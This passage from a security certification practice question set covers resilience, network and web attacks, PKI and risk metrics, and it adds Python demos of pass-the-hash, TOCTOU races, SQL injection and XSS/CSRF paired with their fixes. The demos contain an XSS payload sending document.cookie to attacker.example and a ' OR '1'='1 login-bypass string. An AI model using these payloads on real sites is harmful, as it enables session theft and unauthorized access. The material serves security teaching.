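            drives[d].append(xor_blocks(units) if d == p else next(unit_iter))
    return drives


def raid5_rebuild(drives, failed: int):
    """Recreate every unit of the failed drive as the XOR of the surviving units in its stripe."""
    survivors = [d for i, d in enumerate(drives) if i != failed]
    return [xor_blocks(units) for units in zip(*survivors)]


def raid5_read(drives, length: int) -> bytes:
    """Concatenate data units in order, skipping the parity unit of each stripe."""
    n = len(drives)
    out = bytearray()
    for s in range(len(drives[0])):
        p = parity_drive_for_stripe(s, n)
        for d in range(n):
            if d != p:
                out += drives[d][s]
    return bytes(out[:length])


def demo() -> dict:
    data = b"RAID 5: striping with distributed parity tolerates one drive failure"  # constructed
    n = 4
    drives = raid5_write(data, n)
    lost = drives[2]
    drives[2] = None                      # drive 2 fails
    failures = sum(d is None for d in drives)
    can_rebuild = failures <= 1           # a second failure would need RAID 6's double parity
    drives[2] = raid5_rebuild(drives, 2)
    recovered = raid5_read(drives, len(data))
    return {
        "can_rebuild": can_rebuild,
        "rebuilt_matches_lost": drives[2] == lost,
        "recovered": recovered,
        "matches": recovered == data,
        "usable_fraction": (n - 1) / n,   # one drive's worth of capacity holds parity
    }


if __name__ == "__main__":
    print(demo())
```

Rebuilding a drive means reading every surviving unit of every stripe, which is why a rebuild on large arrays takes hours and why the window of exposure to a second failure is the argument for RAID 6 or RAID 10.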

Which of the answers listed below refers to the primary function of load balancing?

• Maintains identical copies of data across multiple servers to enhance data availability and
reliability

• Distributes workload across multiple servers for improved performance

• Groups servers together to provide high availability and fault tolerance

• Distributes content geographically across multiple servers to improve performance, reduce latency,
and handle high volumes of traffic

Which of the following is the primary function of clustering?

• Distributes content geographically across multiple servers to improve performance, reduce latency,
and handle high volumes of traffic

• Groups servers together to provide high availability and fault tolerance

• Maintains identical copies of data across multiple servers to enhance data availability and
reliability

• Distributes workload across multiple servers for improved performance

Which of the terms listed below refers to a duplicate of the original site, with fully operational computer
systems as well as near-complete backups of user data?

• Hot site

• Warm site

• Cold site

• Mobile site

Which of the following terms refers to an alternate site that provides some pre-installed hardware and
software and might have partial data backups, but it is not fully operational and requires additional
configuration before use?

• Cold site

• Hot site

• Mirror site

• Warm site

A disaster recovery facility that provides only the physical space for recovery operations is known as:

• Hot site

• Warm site

• Cold site

• Mirror site

Which alternate site is the least expensive to implement?

• Cold site

• Mirror site

• Warm site

• Hot site

Which alternate site allows for the fastest disaster recovery?

• Cold site

• Hot site

• Mobile site

• Warm site

What is the name of a U.S. government initiative that provides a set of procedures and plans that an
organization can implement to ensure continued performance of its essential functions during
unexpected events?

• SLA

• COOP

• RPO

• BIA

Which of the answers listed below refers to a simulated scenario conducted in a controlled
environment, typically involving discussions and planning around hypothetical security incidents?

• Tabletop exercise

• Sandboxing

• Threat hunting

• Security awareness training

The process of automatically switching to a redundant or standby system upon detecting a disruption in
the primary system is called:

• Failover

• Multipath I/O

• Load balancing

• Parallel processing

Which of the following answers refers to a more realistic scenario that tests cybersecurity incident
response by mimicking actual attacks?

• Fingerprinting

• Simulation

• Threat hunting

• Tabletop exercise

Which of the solutions listed below provides redundancy and fault tolerance by dividing tasks into
smaller subtasks and distributing them across multiple systems to be executed simultaneously?

• Load balancing

• Multitasking

• Clustering

• Parallel processing

A file-based representation of the state of a virtual machine at a given point in time is referred to as:

• Restore point

• Shadow copy

• Snapshot

• System image

What type of backups are commonly used with virtual machines?

• Incremental backups

• Snapshot backups

• Tape backups

• Differential backups

Which of the following terms refers to a backup strategy that relies on creating and maintaining copies
of data in real-time or near real-time on a separate system?

• Mirroring

• Virtualization

• Journaling

• Replication

A technique that allows to recover changes that occurred since the last backup in the event of a system
crash is known as:

• Replication

• Journaling

• Virtualization

• Mirroring

Which of the answers listed below refers to a device designed to supply (and monitor the quality of)
electric power to multiple outlets?
• PSU

• MDF

• PDU

• IDF

What is the name of a device that can provide short-term emergency power during an unexpected main
power source outage?

• UPS

• PoE

• SVC

• PSU

Which of the following power redundancy solutions would be best suited for providing long-term
emergency power during an unexpected main power source outage?

• Dual-power supply

• Standby UPS

• Backup generator

• Managed PDU

As opposed to simple DoS attacks that usually are performed from a single system, a DDoS attack
uses multiple compromised computer systems to perform the attack against its target. The
intermediary systems that are used as a platform for the attack (often referred to as zombies, and
collectively as a botnet) are the secondary victims of the DDoS attack.

• True

• False

A type of DDoS attack where an attacker exploits vulnerabilities in certain services or protocols to
generate responses that are much larger than the original request is referred to as:

• Amplified DDoS attack

• Volumetric DDoS attack

• Reflected DDoS attack

• Application DDoS attack

What defines a reflected DDoS attack?

• Overwhelming the target with a high volume of traffic to saturate its bandwidth

• Exploiting vulnerabilities in network protocols to consume resources and disrupt services

• Utilizing third-party servers to reflect and amplify attack traffic towards the target

• Targeting vulnerabilities in applications or web servers to exhaust resources

A DNS amplification attack is a type of DDoS attack wherein an attacker sends a small, specially
crafted DNS query with a spoofed source IP address (the victim's IP) to a publicly reachable (open)
DNS resolver. Upon receiving the query, the DNS server generates a much larger response packet, which
is then sent to the victim's IP address, causing potential disruption due to overwhelming traffic.

• True

• False

Which of the answers listed below refers to a cyberattack technique that relies on providing false DNS
information to a DNS resolver for the purpose of redirecting or manipulating the resolution of domain
names to malicious IP addresses?

• DNS spoofing

• Credential stuffing

• URL hijacking

• Domain hijacking

Remapping a domain name to a rogue IP address is an example of what kind of exploit?

• URL hijacking

• DNS cache poisoning

• Domain hijacking

• ARP poisoning

When domain registrants lose control over their domain names due to unlawful actions of third parties,
they fall victim to:

• Sybil attack

• Domain hijacking

• Typosquatting

• URL hijacking

The practice of gaining unauthorized access to a Bluetooth device is known as:

• Phishing

• Bluejacking

• Smishing

• Bluesnarfing

A wireless disassociation attack is a type of: (Select 2 answers)

• Downgrade attack

• Deauthentication attack

• Brute-force attack

• DoS attack
• Cryptographic attack

A wireless jamming attack is a type of:

• Cryptographic attack

• DoS attack

• Brute-force attack

• Downgrade attack

Which wireless attack focuses on exploiting vulnerabilities found in WEP?

• IV attack

• War driving

• SSID spoofing

• Bluejacking

Which of the following statements can be used to describe the characteristics of an on-path attack?
(Select all that apply)

• An on-path attack is also known as MITM attack

• Attackers place themselves on the communication route between two devices

• Attackers intercept or modify packets sent between two communicating devices

• Attackers do not have access to packets exchanged during the communication between two
devices

A network replay attack occurs when an attacker captures sensitive user data and resends it to the
receiver with the intent of gaining unauthorized access or tricking the receiver into unauthorized
operations.

• True

• False

What are the characteristic features of a session ID? (Select 3 answers)

• Typically stored on the server side

• A unique identifier assigned by the website to a specific user

• Contains user's authentication credentials, e.g., username and password

• A piece of data that can be stored in a cookie, or embedded as an URL parameter

• Typically stored on the client side (in the user's browser) rather than on the server

• A unique identifier assigned to a server

In a session replay attack, an attacker intercepts and steals a valid session ID of a user and resends it
to the server with the intent of gaining unauthorized access to the user's session or tricking the server
into unauthorized operations on behalf of the legitimate user.

• True
• False

A technique that allows an attacker to authenticate to a remote server using a stolen password hash,
without recovering the cleartext password from that hash (digest), is called:

• Pass the hash

• Replay attack

• Brute-force attack

• Spraying attack
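
The replay and pass-the-hash questions above describe two different weaknesses of challenge-response authentication. The block below is an added example written for this page (it is not part of the original question set and does not reproduce NTLM's real algorithm): a constructed HMAC-based challenge-response login in which the server stores only a hash of the password. A fresh per-login nonce makes a captured response worthless (replay fails), but because the stored hash is the key used in the response, an attacker holding only the hash still authenticates.

```python
import hashlib
import hmac
import os

# Constructed credential store: the server keeps H(password), never the password.
USER_DB = {"alice": hashlib.sha256(b"correct horse battery staple").hexdigest()}


def password_hash(password: bytes) -> str:
    return hashlib.sha256(password).hexdigest()


class Server:
    """Challenge-response server (hypothetical, for illustration only).
    One-time nonces defeat replay; they do nothing against pass-the-hash,
    because the hash itself is the secret the client must know."""

    def __init__(self):
        self.outstanding = {}  # username -> nonce issued, consumed on first use

    def challenge(self, user: str) -> bytes:
        nonce = os.urandom(16)
        self.outstanding[user] = nonce
        return nonce

    def verify(self, user: str, nonce: bytes, response: bytes) -> bool:
        issued = self.outstanding.pop(user, None)
        if issued is None or not hmac.compare_digest(issued, nonce):
            return False  # unknown or already-consumed nonce: replay rejected
        key = bytes.fromhex(USER_DB[user])
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def respond(password_hash_hex: str, nonce: bytes) -> bytes:
    """Client side: the response proves knowledge of the hash, not the password."""
    return hmac.new(bytes.fromhex(password_hash_hex), nonce, hashlib.sha256).digest()


def legitimate_login(server: Server, user: str, password: bytes):
    nonce = server.challenge(user)
    resp = respond(password_hash(password), nonce)
    return nonce, resp, server.verify(user, nonce, resp)


def replay_attack(server: Server, user: str, captured_nonce: bytes, captured_resp: bytes) -> bool:
    # Attacker sniffed a valid (nonce, response) pair and resends it verbatim.
    return server.verify(user, captured_nonce, captured_resp)


def pass_the_hash(server: Server, user: str, stolen_hash_hex: str) -> bool:
    # Attacker dumped the hash (e.g. from a credential store) and answers a new challenge.
    nonce = server.challenge(user)
    return server.verify(user, nonce, respond(stolen_hash_hex, nonce))


def demo():
    srv = Server()
    nonce, resp, ok = legitimate_login(srv, "alice", b"correct horse battery staple")
    replayed = replay_attack(srv, "alice", nonce, resp)
    pth = pass_the_hash(srv, "alice", USER_DB["alice"])
    return ok, replayed, pth
```

`demo()` returns `(True, False, True)`: the real login works, the replayed pair is rejected because its nonce was consumed, and the stolen hash logs in on a fresh challenge. The practical lesson is that nonces are a replay control, while pass-the-hash must be addressed by protecting the hashes themselves (credential isolation, avoiding hash-as-key protocols).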

Which type of application attack relies on introducing external code into the address space of a running
program?

• Buffer overflow

• Memory injection

• Replay attack

• Pointer dereference

A collection of precompiled functions designed to be used by more than one Microsoft Windows
application simultaneously to save system resources is known as:

• DLL

• API

• EXE

• INI

Which of the answers listed below refers to an application attack that relies on forcing a running process
to load and execute an attacker-supplied library of code?

• Memory leak

• DLL injection

• Pointer dereference

• Buffer overflow

A type of exploit in which an application overwrites the contents of a memory area it should not have
access to is called:

• DLL injection

• Buffer overflow

• Memory leak

• Privilege escalation

A flaw in which the outcome of operations on a shared resource depends on the uncontrolled timing or
ordering of concurrent accesses is described as:

• Race condition
• Concurrency error

• Multithreading

• Synchronization error

A type of vulnerability where the state of a resource is verified at one point in time but may change
before the resource is actually used is referred to as:

• TOC

• TOC/TOU

• TOU

• TSIG
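
The two questions above (race condition, TOC/TOU) are easier to grasp in code. The following is an added example written for this page, not code from the question set. It shows the classic file-system instance: a reader that checks a path and then opens it by name can be fooled if the path is swapped for a symbolic link in between; the hardened version opens once with `O_NOFOLLOW` and checks the descriptor it actually holds, so check and use refer to the same object. The `after_check` hook, the file names and the "secret" content are constructed to make the race window deterministic in a single thread; the example needs a POSIX system that supports symlinks.

```python
import os
import stat
import tempfile


def read_if_regular_unsafe(path: str, after_check=lambda: None) -> bytes:
    """Vulnerable check-then-use. `after_check` exists only to make the race
    window visible; in real code it is the gap between the two system calls."""
    if os.path.islink(path) or not os.path.isfile(path):   # time of check
        raise PermissionError("refusing non-regular file")
    after_check()
    with open(path, "rb") as f:                             # time of use (by name again)
        return f.read()


def read_if_regular_safe(path: str) -> bytes:
    """Hardened: open exactly once without following a symlink, then validate
    the descriptor. There is no second name lookup to race against."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)  # OSError (ELOOP) if path is a symlink
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("refusing non-regular file")
        with os.fdopen(fd, "rb") as f:
            fd = -1                                   # fdopen now owns the descriptor
            return f.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Constructed scenario: an upload directory the attacker can write to,
    next to a secret the reader must never disclose."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.key")
        upload = os.path.join(d, "upload.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")
        with open(upload, "wb") as f:
            f.write(b"harmless")

        def attacker_swaps_path():
            os.remove(upload)
            os.symlink(secret, upload)   # same name, now pointing at the secret

        leaked = read_if_regular_unsafe(upload, after_check=attacker_swaps_path)
        try:
            read_if_regular_safe(upload)  # upload is now the attacker's symlink
            refused = False
        except OSError:
            refused = True
        still_reads_regular = read_if_regular_safe(secret) == b"TOP SECRET"
        return leaked, refused, still_reads_regular
```

`demo()` returns `(b"TOP SECRET", True, True)`: the check passed on a regular file, yet the unsafe reader disclosed the secret, while the hardened reader refuses the symlink and still reads ordinary files. The same pattern (check on a name, act on a descriptor) applies to `access()`/`open()`, `stat()`/`rename()` and similar pairs.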

A malicious application update is a type of malware that can be installed through a seemingly
legitimate software update. The introduction of a malicious update into the application code can be
enabled through various means, including:

• Unsigned application code

• Unencrypted update channel (HTTP vs HTTPS)

• Fake update website

• Unauthorized access to update server

• Compromised software development process

• All of the above

Which of the following answers does not refer to a common type of OS-based vulnerability?

• Access control and permissions vulnerabilities (weak passwords, privilege escalation)

• Vulnerabilities in installed applications, system utilities, and device drivers

• Memory-related vulnerabilities (memory leaks, buffer overflows, race conditions)

• Patch and update management vulnerabilities (security patch and update delays, malicious
updates)

• Vulnerabilities related to system/security misconfigurations

• Network-related vulnerabilities (DoS attacks, remote code execution attacks)

• All of the above answer choices are examples of OS-based vulnerabilities

Which of the answers listed below refers to a security vulnerability that enables injecting malicious
code into input fields, such as search bars or login forms, to execute unauthorized commands on a
database?

• RCE

• SQLi

• XSS

• CSRF
Which of the following indicates an SQL injection attack attempt?

• DELETE FROM itemDB WHERE itemID = '1';

• SELECT * FROM users WHERE userName = 'Alice' AND password = '' OR '1' = '1';

• DROP TABLE itemDB;

• SELECT * FROM users WHERE email = '[email protected]' AND password = '';
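
The second answer above is what a login query looks like after the attacker types `' OR '1'='1` into the password field. The block below is an added example written for this page (not from the question set) that builds exactly that statement from string concatenation against a constructed in-memory SQLite table, shows that it logs in without the password, and contrasts it with the parameterized query that treats the same text as a literal value.

```python
import sqlite3

# The fragment from the question, as an attacker would type it into the
# password field (constructed input).
TAUTOLOGY_PAYLOAD = "' OR '1'='1"


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory user table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Alice', 's3cret')")
    conn.commit()
    return conn


def build_query_vulnerable(username: str, password: str) -> str:
    # String concatenation: the attacker's text becomes part of the SQL grammar.
    return ("SELECT * FROM users WHERE userName = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username: str, password: str) -> bool:
    return conn.execute(build_query_vulnerable(username, password)).fetchone() is not None


def login_parameterized(conn, username: str, password: str) -> bool:
    # Placeholders: values travel separately from the statement text and can
    # never change its structure, so the payload is just a wrong password.
    query = "SELECT * FROM users WHERE userName = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    conn = setup_db()
    injected_sql = build_query_vulnerable("Alice", TAUTOLOGY_PAYLOAD)
    return (
        injected_sql,
        login_vulnerable(conn, "Alice", "s3cret"),           # legitimate login
        login_vulnerable(conn, "Alice", TAUTOLOGY_PAYLOAD),  # bypass: AND binds tighter than OR
        login_parameterized(conn, "Alice", TAUTOLOGY_PAYLOAD),
    )
```

`demo()` returns the injected statement ending in `AND password = '' OR '1'='1'` followed by `(True, True, False)`. Note that `DROP TABLE` chained with `;` would be rejected by `sqlite3`'s single-statement `execute()`, but the tautology alone is enough to bypass authentication; parameterization, not input filtering, is the fix.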

Which of the answers listed below describe the characteristics of a cross-site scripting attack? (Select
3 answers)

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests
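
The XSS and CSRF answer choices above are mirror images of each other: XSS abuses the trust the browser places in the site, CSRF abuses the trust the site places in the browser's session. The following is an added example written for this page (not code from the question set) that shows both in one place. `render_comment_*` is a comment renderer with and without output encoding; `BankApp` is a hypothetical transfer endpoint, with and without a per-session anti-CSRF token. The payload, account names and balances are constructed.

```python
import hmac
import html
import os

# Constructed attacker input for the XSS half of the example.
XSS_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


def render_comment_unsafe(comment: str) -> str:
    """XSS: user input is pasted into HTML, so the *browser*, which trusts the
    site, runs whatever script the attacker submitted."""
    return "<p>" + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    """Output encoding turns markup characters into inert entities."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"


class BankApp:
    """Hypothetical money-transfer endpoint. The *site* trusts the session
    cookie, which the browser attaches even to requests an attacker's page
    triggered: that is the trust direction CSRF exploits."""

    def __init__(self):
        self.balances = {"alice": 100, "mallory": 0}
        self.csrf_tokens = {}  # session user -> token embedded in the genuine form

    def issue_csrf_token(self, session_user: str) -> str:
        token = os.urandom(16).hex()
        self.csrf_tokens[session_user] = token
        return token

    def _move(self, src: str, dst: str, amount: int) -> bool:
        if amount <= 0 or dst not in self.balances or self.balances.get(src, 0) < amount:
            return False
        self.balances[src] -= amount
        self.balances[dst] += amount
        return True

    def transfer_unsafe(self, session_user: str, form: dict) -> bool:
        # Authorises on the cookie alone, so a cross-site form POST succeeds.
        return self._move(session_user, form["to"], form["amount"])

    def transfer_safe(self, session_user: str, form: dict) -> bool:
        # Requires a per-session secret that another origin cannot read.
        expected = self.csrf_tokens.get(session_user)
        supplied = form.get("csrf_token", "")
        if expected is None or not hmac.compare_digest(expected, supplied):
            return False
        return self._move(session_user, form["to"], form["amount"])


def demo():
    xss_runs = "<script>" in render_comment_unsafe(XSS_PAYLOAD)
    xss_blocked = "<script>" not in render_comment_safe(XSS_PAYLOAD)

    # Forged request: Mallory's page auto-submits this form; Alice's browser
    # adds Alice's cookie, so the server sees session_user == "alice".
    forged = {"to": "mallory", "amount": 100}
    app = BankApp()
    csrf_unsafe_ok = app.transfer_unsafe("alice", forged)

    app = BankApp()
    csrf_safe_forged_ok = app.transfer_safe("alice", forged)  # no token: rejected
    token = app.issue_csrf_token("alice")
    legit = {"to": "mallory", "amount": 10, "csrf_token": token}
    csrf_safe_legit_ok = app.transfer_safe("alice", legit)
    return xss_runs, xss_blocked, csrf_unsafe_ok, csrf_safe_forged_ok, csrf_safe_legit_ok
```

`demo()` returns `(True, True, True, False, True)`. Encoding on output (not on input) is the XSS control; for CSRF the token must be unguessable and tied to the session, and `SameSite` cookies are a complementary browser-side defence.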

Which of the terms listed below refers to a situation in which a product or service may no longer receive
security patches or other updates, making it more vulnerable to attack?

• EOL

• ALM

• EOS

• SDLC

What is the main vulnerability related to legacy hardware?

• Compatibility issues

• Lack of security updates and patches

• Worn-out physical components

• Lack of skilled personnel to run it and maintain it

The term "VM escape" refers to the process of breaking out of the boundaries of a guest operating
system installation to access the primary hypervisor controlling all the virtual machines on the host
machine.

• True

• False

Which of the following answers refers to a virtualization-related vulnerability where virtualized assets
allocated to one VM are improperly isolated and can be accessed or compromised by another VM?

• Resource reuse

• Privilege escalation
• Resource exhaustion

• Concurrent session usage

Which of the answers listed below refers to a cloud-related vulnerability type?

• Insecure APIs

• Poor access controls

• Lack of security updates

• Misconfigured cloud storage

• Shadow IT / Malicious insiders

• All of the above

The practice of installing mobile apps from websites and app stores other than the official
marketplaces is referred to as:

• Jailbreaking

• Rooting

• Sideloading

• Carrier unlocking

Which of the following terms is used to describe the process of removing software restrictions imposed
by Apple on its iOS operating system?

• Sideloading

• Carrier unlocking

• Rooting

• Jailbreaking

The term "Rooting" refers to the capability of gaining administrative access to the operating system and
system applications on:

• Android devices

• iOS devices

• Microsoft devices

• All types of mobile devices

A type of attack aimed at exploiting a vulnerability that is present in already released software but
unknown to the software developer is known as:

• On-path attack

• IV attack

• Zero-day attack

• Replay attack
A type of digital document that verifies the identity of an individual, device, service, or organization in
online communications is known as:

• Encryption key

• Digital certificate

• Identity token

• Digital signature

What is the role of RA in PKI? (Select 2 answers)

• Accepting requests for digital certificates

• Validating digital certificates

• Authenticating the entity making the request

• Providing backup source for cryptographic keys

• Issuing digital certificates

Which of the answers listed below refers to a trusted third party responsible for issuing, revoking, and
managing digital certificates?

• RA

• DN

• CA

• CSP

Which of the following answers refers to a means for periodic publication of all digital certificates that
have been revoked?

• CRL

• OSPF

• RA

• CSR

Which of the answers listed below refers to a protocol that enables on-demand querying of the
revocation status of a digital certificate?

• CSP

• OCSP

• DN

• CRL

What is the fastest way to check the validity of a single digital certificate?

• CSR

• DN
• CRL

• OCSP

Which of the following answers can be used to describe self-signed digital certificates? (Select 3
answers)

• Backed by a well-known and trusted third party

• Not trusted by default by web browsers and other applications

• Used in trusted environments, such as internal networks and development environments

• Suitable for websites and other applications that are accessible to the public

• Trusted by default by web browsers and other applications

• Not backed by a well-known and trusted third party

A self-signed digital certificate is also referred to as:

• Client certificate

• EV certificate

• Server certificate

• Wildcard certificate

• None of the above

Third-party digital certificates, issued by trusted CAs, are automatically trusted by most browsers and
operating systems, involve a cost, and require validation of the applicant's identity. In contrast, self-
signed certificates, issued by the entity to itself, are not automatically trusted, are free to create and
use, and do not require validation by a CA.

• True

• False

In the context of digital certificates, the term "Root of trust" refers to the highest level of trust within a
PKI system. It is typically represented by a root CA, which is a trusted third party that serves as the
foundation for the entire PKI. All other entities in the PKI hierarchy, including intermediate CAs and end-
entities (such as web servers, email servers, user devices, IoT devices, and individual users), derive
their trust from this root. When a certificate is issued and signed by an intermediate CA, it gains trust
through a chain of trust back to the root CA. This hierarchical trust model allows users and systems to
trust certificates presented by websites, services, or individuals because they can trace the trust back
to the well-established root of trust.

• True

• False

Which of the answers listed below refers to a PKI trust model?

• Single CA model

• Hierarchical model (root CA + intermediate CAs)

• Mesh model (cross-certifying CAs)

• Web of trust model (all CAs function as root CAs)

• Chain of trust model (multiple CAs in a sequential chain)

• Bridge model (cross-certifying between separate PKIs)

• Hybrid model (combining aspects of different models)

• All of the above

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

A type of digital certificate that can be used to secure multiple subdomains within a primary domain is
called:

• Root signing certificate

• Subject Alternative Name (SAN) certificate

• Extended Validation (EV) certificate

• Wildcard certificate

Which digital certificate type can secure multiple domain names or subdomains with a single
certificate?

• Extended Validation (EV) certificate

• Wildcard certificate

• Subject Alternative Name (SAN) certificate

• Root signing certificate

Which of the answers listed below refers to an identifier used for PKI objects?

• OID

• DN

• SAN

• GUID

An SSID is a unique identifier (a.k.a. wireless network name) for a WLAN. Wireless networks advertise
their presence by regularly broadcasting the SSID in a special frame called a beacon frame. In wireless
networks with security features disabled, knowing the network SSID is enough to get access to the
network. The SSID also identifies the wireless router that acts as a WAP. Wireless routers from the same
manufacturer are frequently configured with default (well-known) SSID names. Since multiple devices
with the same SSID displayed on the list of available networks create confusion and encourage
accidental access by unauthorized users (this applies to networks that lack security), changing the
default SSID is a recommended practice.

• True

• False

For a wireless client to be able to connect to a network, the security type (e.g., WEP, WPA, WPA2, or
WPA3) and encryption type (e.g., TKIP or AES) settings on the connecting host must match the
corresponding wireless security settings on a WAP.

• True

• False

Which of the following answers refers to a security feature used in Bluetooth device pairing?

• SAE

• PIN

• MFA

• ACL

Which of the following solutions would offer the strongest security for a small network that lacks an
authentication server?

• WPA3-SAE

• WPA2-Enterprise

• WPA2-PSK

• WPA3-Enterprise

What are the characteristic features of WPA2/WPA3 Enterprise mode? (Select 3 answers)

• Suitable for large corporate networks

• IEEE 802.1D

• Does not require an authentication server

• IEEE 802.1X

• Suitable for all types of wireless LANs

• Requires RADIUS authentication server

What is the name of the encryption protocol primarily used in Wi-Fi networks implementing the WPA3
security standard?

• AES-CCMP

• CBC-MAC

• AES-GCMP

• WPA-TKIP

Which of the following acronyms refers to a client authentication method used in WPA3 Personal
mode?

• SAE

• IKE

• PSK

• AES

What are the characteristic features of RADIUS? (Select 3 answers)

• Primarily used for network access

• Encrypts the entire payload of the access-request packet

• Combines authentication and authorization

• Encrypts only the password in the access-request packet

• Primarily used for device administration

• Separates authentication and authorization

Which of the wireless encryption schemes listed below offers the highest level of protection?

• WPS

• WPA3

• AES

• TKIP

Which of the following answers refers to a deprecated wireless authentication protocol developed by
Cisco?

• PEAP

• EAP-TTLS

• LEAP

• EAP-TLS

Which of the answers listed below refers to an open standard wireless network authentication protocol
that enhances security by encapsulating the authentication process within an encrypted TLS tunnel?

• PEAP

• EAP

• LEAP

• RADIUS

The process of determining potential risks that could affect an organization's ability to achieve its
objectives is called:

• Risk assessment
• Risk identification

• Risk analysis

• Risk management

The process of evaluating discovered risks to understand their potential impact and likelihood is
referred to as:

• Risk analysis

• Risk assessment

• Risk identification

• Risk management

Which of the following answers refers to a risk assessment method based on need, typically
conducted in response to specific events or changes, such as after a major organizational change or a
security breach?

• Ad hoc

• Recurring

• One-time

• Continuous

Which of the answers listed below refers to an example of recurring risk assessment?

• Real-time monitoring of network security threats

• Assessing risk after a major organizational change or a security breach

• Quarterly or annual risk assessments

• Risk assessment for a new product launch

Which of the following answers refers to a risk assessment conducted for a specific purpose or project,
without plans for regular reassessment (e.g., risk assessment for a new product launch)?

• One-time

• Recurring

• Ad hoc

• Continuous

Which of the answers listed below refers to an example of continuous risk assessment?

• Quarterly or annual risk assessments

• Risk assessment for a new product launch

• Assessing risk after a major organizational change or a security breach

• Real-time monitoring of network security threats

Assessment of risk probability and its impact based on subjective judgment falls into the category of:

• Risk acceptance

• Quantitative risk assessment

• Risk tolerance

• Qualitative risk assessment

A calculation of SLE is an example of:

• Quantitative risk assessment

• Ad hoc risk assessment

• Qualitative risk assessment

• Recurring risk assessment

Which of the following terms is used to describe the predicted loss of value to an asset based on a
single security incident?

• SLE

• ARO

• ALE

• SLA

Which of the acronyms listed below refers to a risk assessment formula defining probable financial
loss due to a risk over a one-year period?

• ARO

• SLE

• ALE

• SLA

Which of the following answers refers to the correct formula for calculating probable financial loss due
to a risk over a one-year period?

• SLE = AV x EF

• ALE = ARO x SLE

• SLE = ALE x AV

• ALE = AV x EF

In quantitative risk assessment, this term is used for estimating the likelihood of occurrence of a future
threat.

• ALE

• SLA

• ARO
• SLE

An estimate based on the historical data of how often a threat would be successful in exploiting a
vulnerability is known as:

• ALE

• SLA

• ARO

• SLE

In the context of risk assessment, the Exposure Factor (EF) is defined as the percentage of loss that a
realized threat would have on an asset. If an organization has an asset valued at $10,000 and the EF is
determined to be 20%, what would be the SLE?

• $500

• $2,000

• $5,000

• $10,000
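
The SLE/ALE questions above, and the risk register question that follows, fit together as one calculation. The block below is an added example written for this page, not part of the question set: a small constructed risk register whose first row is the $10,000 asset with a 20% exposure factor from the question, ranked by ALE, plus a control cost-benefit check (ALE reduction minus the control's annual cost), which the questions do not show but which is the usual reason for computing ALE at all. All asset values, factors, rates and the $1,000 control cost are assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Risk:
    """One row of a risk register (all values below are constructed)."""
    name: str
    asset_value: float      # AV, in dollars
    exposure_factor: float  # EF, fraction of AV lost per incident (0.0 to 1.0)
    aro: float              # ARO, expected incidents per year

    @property
    def sle(self) -> float:
        return self.asset_value * self.exposure_factor   # SLE = AV x EF

    @property
    def ale(self) -> float:
        return self.sle * self.aro                       # ALE = SLE x ARO


def rank_by_ale(register):
    """Highest annualised loss first: the order in which to spend on controls."""
    return sorted(register, key=lambda r: r.ale, reverse=True)


def control_value(before: Risk, after: Risk, annual_cost: float) -> float:
    """Net annual benefit of a control: ALE reduction minus what the control
    costs per year. A negative value means the control costs more than the
    loss it prevents, which argues for acceptance or transference instead."""
    return before.ale - after.ale - annual_cost


# Constructed register; the first row is the $10,000 / 20% case from the question.
REGISTER = [
    Risk("web server defacement", asset_value=10_000, exposure_factor=0.2, aro=1.0),
    Risk("unencrypted laptop stolen", asset_value=3_000, exposure_factor=1.0, aro=2.0),
    Risk("data centre fire", asset_value=500_000, exposure_factor=0.5, aro=0.05),
]


def demo():
    ranked = [r.name for r in rank_by_ale(REGISTER)]
    laptop = REGISTER[1]
    # Full-disk encryption: the hardware is still lost but the data is not, so
    # EF drops (assumed to 0.25); assume the control costs $1,000/year fleet-wide.
    with_fde = Risk(laptop.name, laptop.asset_value, exposure_factor=0.25, aro=laptop.aro)
    return REGISTER[0].sle, ranked, control_value(laptop, with_fde, annual_cost=1_000)
```

`demo()` returns an SLE of $2,000 for the question's asset, the register ranked as fire ($12,500/yr), laptop ($6,000/yr), web server ($2,000/yr), and a net value of $3,500/yr for the encryption control. The ranking is the point of a register: the rare, high-impact fire outranks the frequent, cheap laptop loss once both are annualised.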

Which of the answers listed below refers to a comprehensive document used in risk management and
project management to identify, assess, and track risks?

• Risk register

• Risk heat map

• Risk matrix

• Risk repository

Which of the following terms is used to describe the specific level of risk an organization is prepared to
accept in pursuit of its objectives?

• Risk appetite

• Risk tolerance

• Risk acceptance

• Risk capacity

Which of the terms listed below refers to a general term that describes an organization’s overall
attitude towards risk-taking?

• Risk strategy

• Risk control

• Risk appetite

• Risk tolerance

Contracting out a specialized technical component when the company's employees lack the necessary
skills is an example of:
• Risk deterrence

• Risk avoidance

• Risk acceptance

• Risk transference

Cybersecurity insurance is an example of which risk management strategy?

• Risk avoidance

• Risk deterrence

• Risk transference

• Risk acceptance

In the context of risk acceptance, choosing not to apply certain controls or safeguards for a specific
risk is called:

• Exception

• Evasion

• Exemption

• Exclusion

In the risk acceptance strategy, the practice of temporarily not complying with a standard or policy due
to a specific risk scenario is referred to as:

• Exclusion

• Exception

• Evasion

• Exemption

Disabling certain system functions or shutting down the system when risks are identified is an example
of:

• Risk acceptance

• Risk avoidance

• Risk transference

• Risk deterrence

Which of the following terms describes the process of taking proactive measures to reduce the impact
of identified risks?

• Risk acceptance

• Risk avoidance

• Risk transference

• Risk mitigation
Which of the acronyms listed below refers to a maximum allowable time to restore critical business
functions after a disruption?

• SLA

